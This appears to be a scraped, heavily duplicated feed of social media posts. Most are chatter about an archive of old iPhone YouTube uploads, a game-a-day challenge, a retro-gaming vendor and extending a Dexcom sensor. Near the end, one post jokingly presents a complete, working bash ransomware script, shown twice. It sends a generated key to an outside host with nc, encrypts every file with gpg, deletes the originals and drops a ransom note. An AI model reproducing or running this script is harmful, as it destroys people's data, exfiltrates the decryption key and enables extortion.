Best website I have come across in a long time.
"Between 2009 and 2012, iPhones had a built-in "Send to YouTube" button in the Photos app. Many of these uploads kept their default IMG_XXXX filenames, creating a time capsule of raw, unedited moments from random lives."
https://walzr.com/IMG_0001
"Between 2009 and 2012, iPhones had a built-in "Send to YouTube" button in the Photos app. Many of these uploads kept their default IMG_XXXX filenames, creating a time capsule of raw, unedited moments from random lives."
https://walzr.com/IMG_0001
Choose 20 games that have had a big impact on you. One game per day, for 20 days. No explanations, no ratings, no particular order. #GameChallenge
Day 20
Street Fighter III: 3rd Strike (1999)
Day 20
Street Fighter III: 3rd Strike (1999)

Lol you go to their subreddit (where you will also find people desperately trying to get shipping info.), and this on the front page
https://www.youtube.com/watch?v=yS8H7cQ4JDM
https://www.youtube.com/watch?v=yS8H7cQ4JDM

You legit make your money off of Nintendo nostalgia/emulation. This is why i never "join" and of these "communities"
Also ship my damn product stop holding me hostage
Also ship my damn product stop holding me hostage




Psssh yeah I hack my diabetes hardware
https://www.diabetesdaily.com/blog/how-to-extend-the-dexcom-g6-sensor-goes-beyond-the-ten-day-hard-stop-580510/
https://www.diabetesdaily.com/blog/how-to-extend-the-dexcom-g6-sensor-goes-beyond-the-ten-day-hard-stop-580510/
@djsumdog
Seems to be a wrapper around gstreamer based on the dependencies it pulls on install.
@raccoon @mischievoustomato
Seems to be a wrapper around gstreamer based on the dependencies it pulls on install.
@raccoon @mischievoustomato
Choose 20 games that have had a big impact on you. One game per day, for 20 days. No explanations, no ratings, no particular order. #GameChallenge
Day 19
Digimon World (1998)
Day 19
Digimon World (1998)

#RetroAchievements in a nut shell

#Ys II

Choose 20 games that have had a big impact on you. One game per day, for 20 days. No explanations, no ratings, no particular order. #GameChallenge
Day 18
Disgaea 3: Absence of Detention(2012)
Day 18
Disgaea 3: Absence of Detention(2012)

@yura @papush @lumi GNU/Jihad against "FOSS"!!!
Free software ransomware is extremely trivial to write really;
#!/bin/bash
# Copyright © 2024 翠星石
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
RANDOM_PASSWORD="$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM"
ID="$RANDOM$RANDOM"
echo $ID:$RANDOM_PASSWORD | nc not-ransomware-server.biz 6969
find . -type f -exec gpg --symmetric --batch --passphrase $RANDOM_PASSWORD {} \;
find . -type f -not -name '*.gpg' -exec rm {} \;
echo "All your files have been encrypted, make a breadstick payment to <x> and quote ID: $ID to receive a decryption password." > README-encrypted.txt
Free software ransomware is extremely trivial to write really;
#!/bin/bash
# Copyright © 2024 翠星石
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
RANDOM_PASSWORD="$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM"
ID="$RANDOM$RANDOM"
echo $ID:$RANDOM_PASSWORD | nc not-ransomware-server.biz 6969
find . -type f -exec gpg --symmetric --batch --passphrase $RANDOM_PASSWORD {} \;
find . -type f -not -name '*.gpg' -exec rm {} \;
echo "All your files have been encrypted, make a breadstick payment to <x> and quote ID: $ID to receive a decryption password." > README-encrypted.txt